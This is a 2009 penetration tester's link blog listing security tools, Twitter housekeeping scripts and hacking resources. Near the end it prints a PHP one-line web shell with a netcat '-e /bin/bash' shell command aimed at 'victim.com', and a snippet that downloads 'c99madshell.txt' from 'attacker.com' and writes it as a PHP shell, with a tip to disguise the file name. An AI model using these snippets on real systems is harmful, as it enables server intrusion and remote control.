Sunday, October 4, 2009

Moving Home

With my move to SquareSpace, I've decided to Mubix Links over there as well.

You can find it now at: http://www.room362.com/mubixlinks/

Please update your feeds to: http://www.room362.com/mubixlinks/rss.xml or start using the FeedBurner address: http://feeds.feedburner.com/MubixsLinks

For those of you using the feedburner address, you shouldn't have to change a thing.

Sorry for the hassle, just trying to consolidate and slim down ;-)

Tuesday, September 22, 2009

Monday, September 21, 2009

Script to unblock people on Twitter – Ruby

I created this script because I couldn’t really find anything out there for it. Both the Twitter support page and all the Twitter APIs out there had the ability to unblock people, but only if you knew who you wanted to unblock. Recently I tried the Twitter Karma service that could Mass unfollow / block people (hence my last couple scripts). I clicked the wrong button one time and it blocked a whole bunch of people. But say your not a klutz like me, maybe you just forgot who you’ve blocked over time.

This script will dump the list of people you block and unblock them all. Now you could expand this to get the names of each individual that you block but that’s an API call for each. Let me know if there is a better way, right now, the only way to figure out who was unblocked is through the 302 response that is generated with each request that sends you to the users page that you unblocked. (Push this script through a proxy to see it.)

 

#!/usr/bin/env ruby

require 'net/http'

require 'rexml/document'
include REXML

use_proxy = false
proxy_srvr = "127.0.0.1"
proxy_port = "8080"
proxy_user = ""
proxy_pass = ""

twitter_user = "joeuser"
twitter_pass = "password1"

header = {
    'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
    'X-Requested-With' => "XMLHttpRequest",
    'Cookie' => "__utma="
}

data = "authenticity_token=&twttr=true"

doc = "temp"

if use_proxy == true
    Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
        req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
        req.basic_auth twitter_user, twitter_pass
        response = http.request(req)
        doc = Document.new response.body
    }
else
        Net::HTTP.start('twitter.com') {|http|
            req = Net::HTTP::Get.new('/blocks/blocking/ids.xml')
            req.basic_auth twitter_user, twitter_pass
            response = http.request(req)
            doc = Document.new response.body
    }
end

blocks = doc.elements.each('//id') { |f|
    if use_proxy == true
            Net::HTTP::Proxy(proxy_srvr, proxy_port, proxy_user, proxy_pass).start('twitter.com') {|http|
            req2 = '/blocks/destroy/' + f.text
            response2 = http.post(req2, data, header)
            puts response2.code
            }
    else
            Net::HTTP.start('twitter.com') {|http|            
            req2 = '/blocks/destroy/' + f.text
            response2 = http.post(req2, data, header)
            puts response2.code
            }
    end

    puts "Unblocking: " + f.text
}

Script to unfollow people on twitter - Python

This is exactly like the last script with a few minor changes. 1st, the last script only has the ability to force people to unfollow you if you aren’t following them. 2nd, the api call and the request URL are different. GetFollowers instead of GetFriends, and friendships/remove instead of friendships/destroy. Don’t forget to fill in the same 4 fields that were missing/wrong in the last one.

 

#!/usr/bin/python

import twitter
import urllib2

headers = {
'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
'Cookie'  : "__utma=",
}

data = "authenticity_token=&twttr=true"

api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
    users = api.GetFollowers(page=b)
    for i in users:
        request = http://twitter.com/friendships/remove/ + str(i.id)
        req = urllib2.Request(request,data,headers)
        post = urllib2.urlopen(req)
        print post

Script to force people to unfollow you on twitter - Python

I left the authenticity token and Cookie partially filled out so you know what to look for in your request. But basically you fill out those two variables, plus your user / pass of course and it will go through 100 pages of your followers, which should peg out your API calls. You’ll have to wait another hour to keep going, but you could easily put this on a loop until it you got down to 0. The out put could use a bit of cleaning up. You’ll need python-twitter, but BT4 and Ubuntu at least has it in it in their repos for easy install.

 

#!/usr/bin/python

import twitter
import urllib2

headers = {
'User-Agent' : "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
'Cookie'  : "__utma=",
}

data = "authenticity_token=&twttr=true"

api = twitter.Api(username='joeuser', password='password1')
for b in range(1,100):
    users = api.GetFriends(page=b)
    for i in users:
        request = "http://twitter.com/friendships/destroy/" + str(i.id)
        req = urllib2.Request(request,data,headers)
        post = urllib2.urlopen(req)
        print post

Saturday, September 19, 2009

Security is Simplicity: Comment by Akibako

This was posted as a comment to my blog before I took it down, and the information in it I didn't want to go to waste. So I've reposted it here:
akibako <nobody@nowhere.com> (unregistered) wrote:

I wholeheartedly agree with your main point. That said -- and I hate to be the one to split hairs -- I would argue that your Japanese citations are inaccurate.



Japanese people have and use credit cards all the time. According to the Bank for International Settlements, the number of Japanese credit card holders is roughly equal to that of Germany, and even exceeds Canada. It *is* true, however, that Japan does not have 'check cards', but this is simply because Japan does not have checks. The vast majority of cards in Japan work the system of automatically deducting the *entire* balance of the credit card once every month.



Getting a credit card just as easy as in the States. I got my first Japanese credit card after filling out a half-page form which took less than 5 minutes. No major form of identification was necessary. I get offers for "pre-approved" credit cards in my mail box every month.



Japanese people bank online constantly. Earlier this year, #2-seated cell phone carrier AU launched a partnership with Tokyo Mitsubishi UFJ Bank to access all of your banking functions over your cell phone, including balance transfers. It's been hugely popular, and other carriers have followed suit. The most profitable bank in Japan in 2004 was Shinsei Bank, which differentiates itself by essentially running an online-banking-only presence. Visiting a branch requires you to interface with your account using a PC, not a bank clerk.



Japanese people buy stuff online constantly. Last year, online sales figures per capita in Japan were only slightly below that of America.



In such a disaster-prone country as Japan, It would be short-sighted to assume that the Japanese government doesn't keep easily-backup-able electronic versions of important documents. My family registry, proof of residency, and marriage certificate are all given to me via a laser-printed document (made official by a number of stamps).



Stamps (hanko, inkan) are just as easy to copy -- if not more so -- as written signatures. Life is made infinitely more difficult for the average person as one usually has a number of these stamps in slight variations in design. They are the antithesis of simplicity. There are no records provided telling you which stamp was used for a given document. I've had documents rejected for not having the "correct" inkan, only to have the company later apologize for incorrect verification. The illusion of security is amplified by the perception among people that hanko/inkan are un-forgeable (password analogy, anyone). It is common practice for a business to accept a document from someone other than the document holder simply because it has the correct hanko. There have been numerous news stories of wives emptying their husband's bank accounts and fleeing the country.



The amount of data I push over my lines every month would *easily* be classified as "excessive use" (many times over). While it might be detected by the ISP, disconnections due to it are unheard of.



I agree with, and appreciate, the crux of your argument completely, but do not think that these specific examples from Japanese society are strong fodder.

Thursday, September 17, 2009

Download without touching a site

Blocked from a specific download? On a pentest and don’t want your IP seen pulling a file? Doing malware analysis and don’t want to directly get a file? Here’s the solution:

http://filecanny.com/

I’m sure you’ll figure out how to use it that best fits your needs.

Getting 3D video working on Dell Mini 10

Really had to find (for me at least):

http://credentiality2.blogspot.com/2009/08/accelerated-video-on-dell-mini-10-with.html

This is THE way to get it working right.

FastStone Capture

This tool jaded me for any other screen capturing. I can’t live without it: (The following link is to the freeware version)
http://www.portablefreeware.com/?id=775

It went to trialware after 5.3 so you can download the version 6.5 at:
http://www.faststone.org/FSCaptureDetail.htm

It’s only 19.95 and adds a lot of features including a Screen Recorder.

Both versions are completely portable.

.htaccess tricks

16 cool htaccess uses that help you get a better grip on it’s use:
http://www.thomsonchemmanoor.com/16-useful-htaccess-tricks-and-hacks-for-web-developers.html

Pentest Console

This was talked about at Security BSides ( by @jcran ), and the video is on the site, but it boils down to a collaboration tool that is super fitted for pentesting.

http://www.pentestconsole.com/

Monday, September 7, 2009

Offline Microsoft Updates

I’m surprised I haven’t added this my links before:

CTUpdate 6.0 - http://www.h-online.com/security/Offline-Update--/features/112953

The USB stick option in 6.0 is sweet (which you could kinda already do if you knew what directory to copy)

Add this thing to a hacked U3 device to make it silently install updates for Windows / Office products makes a really quick update process.

Saturday, August 29, 2009

@cktricky ‘s DirSnatch

This is one of those tools that doesn’t quite cross your mind until you see it’s power. DirSnatch is a one stop executable that you can give a customer of a web app sec test, they run it, and you get back a perfectly formatted text file for your testing needs of all their directories and files.

http://cktricky.blogspot.com/2009/08/source-code-of-dirsnatch.html

Saturday, August 22, 2009

Microsoft Word Auto-Close Prank

This little stunt remaps the 'e' key to close Word without saving:
http://www.iambetterthanu.com/2007/11/22/microsoft-word-prank/

I wonder what other evil remapping can be done ;-)

Friday, August 21, 2009

Convert VirtualBox VMs to VMware VMs

So I found this and thought it an awesome one liner:
Source: http://ubuntuforums.org/showthread.php?t=772419

How to convert VBox machine to VMware

I figured it out!! YAY!!

"sudo qemu-img convert /home/emil/.VirtualBox/VDI/WindowsXP.vdi /home/emil/Desktop/XP.vmdk"

I'm not sure if need to be executed with "sudo" but that worked for me. Now I can switch to Vmware Virtual Machine from Virtual Box.

Stream your screen via VLC

I’ve seen this before, and I think I’ve done this before, but it’s still awesome and I’m thinking about it’s use for doing training. Nothing says you can do it over the net. Haven’t tried.. yet:

http://www.nerdlogger.com/2008/01/stream-your-linuxwindowsmac-desktop-as.html

Thursday, August 13, 2009

Decoding eval(gzinflate(base64_decode(

Trying to fix it so that my site didn’t say it was sponsored by “Car Dealers” I ran across an eval(gzinflate(base64_decode( encoded message. Google came up with this 2006 post:

http://danilo.ariadoss.com/decoding-eval-gzinflate-base64-decode/

But that didn’t work for me for some reason, but the online one I found later worked like a charm:

http://www.tareeinternet.com/scripts/decrypt.php

Monday, August 3, 2009

RFID Security - Free ID Cards Anyone?

This is definitely not my normal link. But it's something that I am going to print off and shove in a couple peoples faces to read. Don't discount it because of it's title as I almost did. Please read it. (Hence my titles vagueness, I didn't want the same thing to happen)

http://www.wired.com/threatlevel/2009/08/fed-rfid/

Blackhat US 2009 (Vegas) Archives

Some videos are already posted!
http://blackhat.com/html/bh-usa-09/bh-usa-09-archives.html

UDP Tunneling over SSH

http://zarb.org/~gc/html/udp-in-ssh-tunneling.html

Credit:
Singe tweeted: How to tunnel UDP through SSH, http://is.gd/20fja The socat example worked like a charm for me. A quick hack for when OpenVPN is overkill.

Friday, July 31, 2009

Programming from the Ground Up

RT @windexh8er: Was looking for a good assembly book. Ran across free! Friday FTW. http://tr.im/uV73
(Long Version: http://savannah.inetbridge.net/pgubook/)

I have only had a chance to jump through it quickly but the examples look easy to read and has a bunch of explination surrounding it. Definitely in my 'to read' pile.

Then @craigbalding countered with: @mubix @windex8er cool...but don't forget the original ASM freebie: http://webster.cs.ucr.edu/AoA/index.html (The Art of Assembly)

This should be enough assembly to fill quiet a few weekends.

Thursday, July 23, 2009

Ncrack – Think Hyrda integrated into Nmap

and made better ;-)

http://sock-raw.org/nmap-ncrack/ncrack_draft.html

Salted Password Cracker / MetaScanner

Kalgecin has two great tools over at his Google code page.

Crack.pl - md5/sha1cracker, works with dictionaries as well as rainbowtables. Or so it says. I haven’t tested yet.

MetaScanner – Kinda like db_autopwn but a lot more customizable.

http://code.google.com/p/kalgecin/downloads/list

Internet by all means

S├ębastien Raveau posted a great article back in June about all the different ways of getting internet access when that access is restricted. I tweeted about it and talked about it but never put it here, and I always have a hard time re-finding his site (this is my only bookmarking)

http://blog.sebastien.raveau.name/2009/06/internet-by-all-means.html

Definitely check it out if you haven’t already.

Usenet Resource Downloader

Yes.. people still use Usenet. And this is a great way of accessing those pirated movies in-depth technical discussions.

http://urdland.com/

Source: http://www.ghacks.net/2009/07/23/a-web-interface-for-newsgroups-downloads/

Wednesday, July 22, 2009

InGuardians Tools List

Some of my favorites: SSH_Decoder, Middler, and ServifyThis

http://www.inguardians.com/tools/

WardriveSQL

A database driven wardriving / wep cracking machine.

Original post: http://www.phonelosers.com/index.php?topic=4209.0

“New Site”: http://wardrivesql.info/

Bindshell’s Tools List

Makers of BeEF (Browser Exploitation Framework) have a bunch of other great tools:

http://www.bindshell.net/tools

Echo Mirage is one I have a lot of fun with. And Dnetj is a REALLY useful setup if you can get it going on some beefy boxes.

Metacab

http://www.phx2600.org/archive/2008/08/29/metacab/

Metacab is a cabinet file that contains Netcat, Nmap, VNC and other remote administration utilities that need only a Windows command shell, cmd.exe, to install and use. Install and uninstall scripts are included, and work is being completed on antivirus evasion.

CeWL – Custom Wordlist Generator

By @diginina

http://www.digininja.org/cewl.php

By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behavior can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.

Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.

Backdooring OpenSSH by Ithilgore

http://sock-raw.org/netsec/sshbackdoor

Reverse Code Engineering Tool Library

The “Collaborative RCE Tool Library” is an awesome list of tools used for RE, but as with all tools, they can be used in a ton of different ways

http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools

Core Security Free Tools

http://www.coresecurity.com/content/open-source-projects

Monday, July 20, 2009

Structure of Microsoft PE Files

This is almost as bad as reading the IA32 Assembly manuals, but it’s a must read and it’s really not that long.

Everything you ever wanted to know about PE files:

http://msdn.microsoft.com/en-us/magazine/ms809762.aspx

Thanks cpwp from the Offensive Security forums for the link

Computer Hardware Cheat-Sheet Poster

It costs ($49) to get printed, but you can print it yourself. A great reference for anyone that has ever built a computer.

http://sonic840.deviantart.com/art/Computer-hardware-poster-1-7-111402099

Saturday, July 18, 2009

Polypack – What packer is your friend?

This site checks your binaries against AV, packed and unpacked, then tells you what the best packer, if any would help you avoid AV. But remember, this means you are uploading your binary to a host that you don’t know.

http://polypack.eecs.umich.edu/w00tpc/

Ncat – Nmap’s new Netcat

Ncat adds many capabilities not found in Hobbit's original nc, including SSL support, proxy connections, IPv6, and connection brokering. The original nc contained a simple port scanner, but we omitted that from Ncat because we have a preferred tool for that function

http://nmap.org/ncat/guide/index.html

In-depth Windows Registry

Tim from the PenTest mailing list posted the following references that really delve deep into the Windows hive:

The Windows registry hive format is described here:
http://sentinelchicken.com/research/registry_format/
Also, some of Brendan Dolan-Gavitt's tools and blog
(http://moyix.blogspot.com/) posts may be helpful in figuring out
what's what in SAM hives.

Bypassing Software Restriction Policies

http://hype-free.blogspot.com/2009/07/bypassing-srp-from-powershell.html

Beating Linux ASLR

http://jbrownsec.blogspot.com/2009/07/beating-linux-aslr.html

Friday, July 17, 2009

Buffer Overflow examples

“Insecure Programming by Example” http://community.corest.com/~gera/InsecureProgramming/

These are great tutorials that you can compile and find your zerodays in them. (oh , then send them to a friend, use ServifyThis to make it a service and have you very own vuln)

Offsec LM Cracker

http://cracker.offensive-security.com/index.php

Wednesday, July 8, 2009

BRAWNDO

They currently have a “Summer Special” for 22.00 a case.

http://www.reduxdirect.com

Sunday, July 5, 2009

Paimei – Reverse Engineering Framework

http://code.google.com/p/paimei/

Script Your Documentation Instantly

A great project that allows documentation of network assets locally and over the network ;-) (SYDI). It does a lot that the Meterpreter script ‘winenum’ does, and a whole lot more. Most of it really doesn’t help you as an attacker, but it did spark a lot of good ideas, and sometimes you might not have the power of meterpreter at your beck & call.

http://sydiproject.com/

sslstrip

Can’t believe I never posted this, it’s Moxie’s sslstrip tool from BH DC 2009. Does some amazing things to help MITM ssl sessions.

http://thoughtcrime.org/software/sslstrip/index.html

WMI interfacing Python Script (nix)

http://dev.zenoss.org/svn/trunk/wmi/

Thanks to Joe McCray of http://www.learnsecurityonline.com/ for the link!

Thursday, July 2, 2009

Validation

If you haven’t seen this video yet, it’s well worth the 16 minutes of your life (yes it is a bit corny):

Handwritten fronts – Presenters this is for you!

One of Garr Reynolds from Presentation Zen’s staples when creating a presentation is to use a unique font. Here is an amazing resource for handwritten fonts, which look GREAT on presentations:

http://www.hongkiat.com/blog/40-free-high-quality-hand-drawn-fonts/

Wednesday, June 24, 2009

PickAXE – Pragmatic Ruby

http://whytheluckystiff.net/ruby/pickaxe/

An awesome online resource for learning Ruby

Windows Heap Overflows using Process Environment Block (PEB)

After a bunch of googling to find out what PEB was I happened upon this old milw0rm paper, which answered that question and the one I was going to ask next: How is it used in exploitation:

http://milw0rm.org/papers/66

LordPE eat your heart out

Explorer Suite is awesome, here is their description:

A freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64. Special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker etc. First PE editor with support for .NET internal structures. Resource Editor (Windows Vista icons supported) capable of handling .NET manifest resources. The suite is available for x86, x64 and Itanium.

http://ntcore.com/exsuite.php

System Call Ordinals for XP SP2 x64

http://indefinitestudies.org/2009/01/22/digging-up-system-calls-ordinals-on-xp-x64/

I apologize for not remembering who tweeted this to thank them. But thanks to Daniel Reynaud for posting it.

Tuesday, June 23, 2009

Nessus SCTP scanning

Stolen from: http://blog.tenablesecurity.com/2009/05/scanning-monitoring-for-sctp.html

Paul goes into a lot of meat and potatoes about SCTP but the juice is here:

To scan for SCTP on your network and check if you are vulnerable using Nessue:

Enable “IP Protocols Scan” under the “Misc” plug-in family, and check “Thorough tests(slow)” in the Advanced tab of the scan policy under “Global Variable Settings”.

Monday, June 22, 2009

Dan Guido’s Videos

At the current time of posting, there are a 10 videos that as a security professional, you NEED to watch. It’s free training from some of the best in the biz. Bookmark it.

http://www.vimeo.com/dguido

Fiddler and Watcher

Fiddler is a web debugger, and watcher is a plug-in that adds security testing options to Fiddler.

http://www.fiddler2.com/fiddler2/

Watcher (Fiddler plug-in): http://websecuritytool.codeplex.com/

HTTP over SMTP proxy

http://sectechno.wordpress.com/2009/06/10/http-over-smtp-proxy/

Thursday, June 18, 2009

“Compile” python to a single executable

Here is a script David Kennedy (ReL1K) sent me a while back when we wrote a trojan for the Cyber Collegiate Defense Competition:

Just download py2exe, python setup.py install, then you have py2exe installed....

Say you have a file moo.py you want to compile, just take the code below and put it in a file called compile.py or something, modify it to change 'moo.py' to whatever py you want to compile and run python compile.py build py2exe and your all done. Super simple.


from distutils.core import setup
import py2exe, sys, os
# Hot Sex
sys.argv.append('py2exe')

setup(
    options = {'py2exe': {'bundle_files': 1}},
    console= [{'script': "moo.py"}],
    zipfile = None,
)

Pastebin has evolved.

Etherpad is a pastebin like site where you can edit on the fly… and so can a dozen other people. They actually do a REALLY good job at monitoring changes from everyone. There is also a chat feature, that way you aren’t notepad chatting, and an IMPORT functionality. Importing is great when your clipboard buffer just might not be good enough:

http://etherpad.com/

.. just wow.. (Google check them out, they nailed something you are STILL having problems with, but of course, you are still in BETA)

Wednesday, June 17, 2009

Web App Sec Testing Firefox Extension Collection

A really good list of extensions. The best way to do this is keep multiple copies of Portable Firefox with the addons. I would suggest naming the directories for each copy of Firefox accordingly and also editing their configuration to allow simultaneous starting and altering the title bar so that you can differentiate between the multiple instances.

https://addons.mozilla.org/en-US/firefox/collection/webappsec

Tuesday, June 16, 2009

Phenoelit

Tired of hitting the main site, and making the jump..

http://www.phenoelit-us.org/index.html

Windows functions to open a socket/connection

I hope to be using these links to use as part of .. you know what… I forgot, but I know it will come back to me and I’ll need these links, so I am storing them here. Muhahahah..

http://msdn.microsoft.com/en-us/library/ms738545(VS.85).aspx

http://www.ntkernel.com/w&p.php?id=7

CORE Security IE Zone Bypass MS09-019

CORE’s write-up + code: http://www.coresecurity.com/content/ie-security-zone-bypass

MS09-019 advisory: http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx

5 Security Holes at the Office (Video)

CSO interviewed Chris Nickerson and he showed a reporter 5 security problems a random office building had before he ever entered the building:

http://www.csoonline.com/article/494464/Social_Engineering_Security_Holes_at_the_Office_Includes_Video_

Wednesday, June 10, 2009

Pluses and Minuses of forced SmartCard login

Registry Key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption

Off Setting: DWORD=0
On Setting: DWORD=1

This option can make Kon-boot, OFFLINE NT PASSWORD RESET and some of HIREN’s PASSWORD tools pretty useless. But wait.. Can’t you edit the registry offline? Yup! (Be sure to pull the plug because “Computer” policies are applied BEFORE the logon prompt appears)

Tuesday, June 9, 2009

Monday, June 8, 2009

ARPFreeze: Protection against ARP spoofing – Iron Geek style

So IronGeek puts out tons of videos and some pretty sweet tools. This one is no less awesome:

http://www.irongeek.com/i.php?page=security/arpfreeze-static-arp-poisoning

 

Technitium MAC Address Changer

So, yes, it can change your MAC address on your Windows box, but it does A LOT more. Definitely something to pull around with you on a USB stick.

http://www.technitium.com/tmac/index.html

WEPBuster – Perl Autohacking

A perl script that automates the whole process of WEP cracking.

http://code.google.com/p/wepbuster/

GNS3 Network Simulator

http://www.gns3.net/

Probably the best way of getting hands on a Cisco without buying one off of eBay. Tons of features and probably the only sim I’ve worked with that has the complete feature set of the actual devices. (Probably because you have to supply it with a real IOS file)

Sunday, June 7, 2009

Crypto for Pentesters

Chris Eng does  a good job at explaining what you need to know:

http://video.google.com/videoplay?docid=-5187022592682372937

ISO Standards translated to “Plain English”

I don’t work with ISO standards, but definitely worth keeping the link

http://www.praxiom.com/

And on twitter: http://twitter.com/praxiom

Metasploit online payload generator

Just for those who didn’t know it was there:

http://metasploit.com:55555/PAYLOADS

New version of iKAT

iKat is a “Kiosk Attack Tool” the page is certainly NSFW:

http://ikat2.ha.cked.net

Thursday, June 4, 2009

10 Questions you don’t want to ask in interviews

http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2009/04/19/JOBSryan.DTL

  1. "What does your company do?"
  2. "Are you going to do a background check?"
  3. "When will I be eligible for a raise?"
  4. "Do you have any other jobs available?"
  5. "How soon can I transfer to another position?"
  6. "Can you tell me about bus lines to your facility?"
  7. "Do you have smoking breaks?"
  8. "Is [my medical condition] covered under your insurance?"
  9. "Do you do a drug test?"
  10. "If you hire me, can I wait until [more than three weeks from now] to start the job?"

Sandcat – Advanced Web App Sec Tester

There are tons of scanners/testers on the market, but this one’s feature set kinda caught my eye:

http://pentestit.com/2009/06/04/sandcat-advanced-web-application-security-tester/

As of now, the SandCat will scan for these fault injections:
* Buffer Overflow
* Cookie Manipulation
* Command Execution
* CRLF Injection
* Cross Frame Scripting
* Cross-Site Scripting (XSS)
* Default Account
* Directory Listing
* Directory Traversal
* File Inclusion
* Information Disclosure
* LDAP Injection
* MX Injection
* Password Disclosure
* Path Disclosure
* PHP Code Injection
* Server-Specific Vulnerabilities: IIS / iPlanet / Others
* Source Code Disclosure
* SQL Injection
* XPath Injection
* Miscellaneous

Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:

http://www.omninerd.com/articles/r00tkit_Analysis_What_Is_A_Rootkit/print_friendly

Technorati Tags: ,,,

“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages:

http://hackxcrack.es/

http://www.darkc0de.com/index.shtml

http://www.playhack.net/

http://trythis0ne.com/?page=toolz

http://avhackers.com/index.php

https://www.ihteam.net/#

http://www.w4ck3d.org/forums/

http://www.megapanzer.com (Yes you have seen this one before, but in reference to their RAT)

http://hackforums.net

================================

Un.Aware eZine ( http://www.awarenetwork.org/etc/)

Uninformed eZine ( http://uninformed.org/? )

Phrack eZine ( http://phrack.org/ )

Phrack issue #64 by TCOLH - “A brief history of the Underground scene: ( http://phrack.org/issues.html?issue=64&id=4&mode=txt )

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from: http://msmvps.com/blogs/athif/pages/66375.aspx

Copy and Paste the code below into a text file and name it&nbsp;AUForceUpdate.cmd


=======================================================================
@echo off
Echo This batch file will Force the Update Detection from the AU client:&nbsp;
Echo 1. Stops the&nbsp;Automatic Updates Service&nbsp;(wuauserv)
Echo 2. Deletes the&nbsp;LastWaitTimeout&nbsp;registry key (if it exists)&nbsp;
Echo 3. Deletes the&nbsp;DetectionStartTime&nbsp;registry key (if it exists)&nbsp;
Echo 4. Deletes the&nbsp;NextDetectionTime&nbsp;registry key (if it exists)
Echo 5. Restart the Automatic Updates Service&nbsp;(wuauserv)&nbsp;
Echo 6.&nbsp;Force the detection&nbsp;
Pause
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.
Pause
==================================================================

tail -f, I must leave you for another

Stolen from: http://www.shell-fu.org/lister.php?id=820


tail -f


This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:
http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

http://www.rnicrosoft.net/docs/X86_Win32_Reverse_Engineering_Cheat_Sheet.pdf


Lenny Zeltser's Reverse Egineering Cheat Sheet:

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html


And the Unix Toolbox. DO NOT underestimate the power of this booklet:

http://cb.vu/unixtoolbox.xhtml


Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never, nor are signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.
http://nopsr.us/

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find: http://github.com/relevance/tarantula

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc


Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

http://www.scribd.com/doc/2902062/Handwriting-Analysis-Success-Secrets-Bart-A-Baggett

Danzer - ActiveX Fuzzer

http://www.cert.org/vuls/discovery/dranzer.html

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:
http://www.snort.org/vrt/tools/officecat.html

Friday, May 15, 2009

PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run http://victim.com/whatever.php?cmd=nc -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

       $shell = "http://attacker.com/c99madshell.txt"; //use something less obvious like readme.txt
       $code = file_get_contents($shell);
       $fp=fopen("Sh3ll.php","w+");
       fwrite($fp, $code);
       fclose($fp);
?>


Shell Code Development

Place has some pretty sick shellcode: http://www.shell-storm.org/

Huge List of Online Crackers

Don't know if all of these are online still or not:
SOURCE:(http://blackhat.ge/?page_id=29)

http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/crack-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

md5:
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can’t read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
